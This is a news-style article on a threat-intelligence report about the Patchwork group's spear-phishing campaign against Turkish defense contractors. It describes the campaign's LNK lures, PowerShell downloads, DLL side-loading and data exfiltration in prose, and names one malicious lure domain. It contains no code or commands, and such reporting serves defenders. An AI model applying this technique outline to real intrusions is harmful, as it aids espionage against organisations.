Patchwork’s New Campaign Targeting Turkish Defense Contractors
Overview of the Threat
In a recent report from Arctic Wolf Labs, the hacking group known as Patchwork has been linked to a sophisticated spear-phishing effort aimed at Turkish defense contractors. This campaign appears strategically timed to coincide with growing defense partnerships between Turkey and Pakistan, amid ongoing military tensions between India and Pakistan.
The Mechanics of the Attack
The spear-phishing campaign utilizes a carefully orchestrated five-stage execution chain. Attackers send out malicious LNK files that masquerade as conference invitations to potential targets interested in unmanned vehicle systems. These files initiate the first phase of the attack, leading to a more extensive exploitation of vulnerabilities within the victims’ systems.
Geographic and Strategic Implications
Patchwork, also referred to as APT-C-09 or Dropping Elephant, is thought to have state sponsorship, likely originating from India. Historically active since 2009, this group has a history of targeting entities in China, Pakistan, and other South Asian countries. The current campaign effectively expands their geographic focus to include Turkish defense contractors, signaling a strategic interest in regions where defense cooperation is evolving.
Previous Activities and Evolving Strategies
Just a year prior, the Knownsec 404 Team revealed that Patchwork was targeting organizations connected to Bhutan, deploying the Brute Ratel C4 framework and updating a backdoor known as PGoShell. Since early 2025, the group has shifted its focus toward Chinese universities, leveraging themes associated with power grid management to deliver a Rust-based loader and employing a C# trojan named Protego to gather sensitive information from compromised systems.
Infrastructure Overlap with Other Threat Actors
Recent findings from QiAnXin, a Chinese cybersecurity firm, further indicate that Patchwork may share operational connections with the DoNot Team (APT-Q-38), hinting at collaborative efforts among various cyber threat actors.
Details of the Attack Chain
The spear-phishing strategy includes malicious Windows shortcut files (LNK) delivered via email. These LNK files are crafted to execute PowerShell commands that download payloads from an external server, specifically designed to look authentic. One such domain, "expouav.org," was registered on June 25, 2025, and is hosting a PDF designed to lure victims by mimicking an international conference related to unmanned vehicle systems.
The Role of Deceptive Lures
The PDF serves as a visual distraction, allowing the attack to progress without the user’s knowledge. As Turkey commands a significant share of the global UAV export market and develops hypersonic missile technology, the targeting reflects a calculated effort to gain strategic intelligence during a period of heightened geopolitical tension.
Technical Evolution of Malware
Among the payloads downloaded during the attack is a malicious DLL, which is executed through a method known as DLL side-loading via a scheduled task. This process ultimately leads to the deployment of shellcode that conducts extensive reconnaissance on the infected host, including taking screenshots and exfiltrating data back to the attacker’s server.
Advancements in Attack Capabilities
Arctic Wolf has identified a marked evolution in Patchwork’s operational methods, transitioning from x64 DLL variants to x86 PE executables. This shift signifies not only an enhancement in their command structures but also suggests a focused investment in operational development. The evolution reflects a broader diversification of attack methodologies, employing more sophisticated command and control protocols that mimic legitimate websites.
Conclusion
As the geopolitical landscape shifts, the activities of threat actors like Patchwork underscore the need for heightened vigilance among defense contractors and other organizations operating within sensitive sectors. The ongoing adaptations in their cyber tactics emphasize the pressing importance of cybersecurity measures to safeguard against evolving threats.
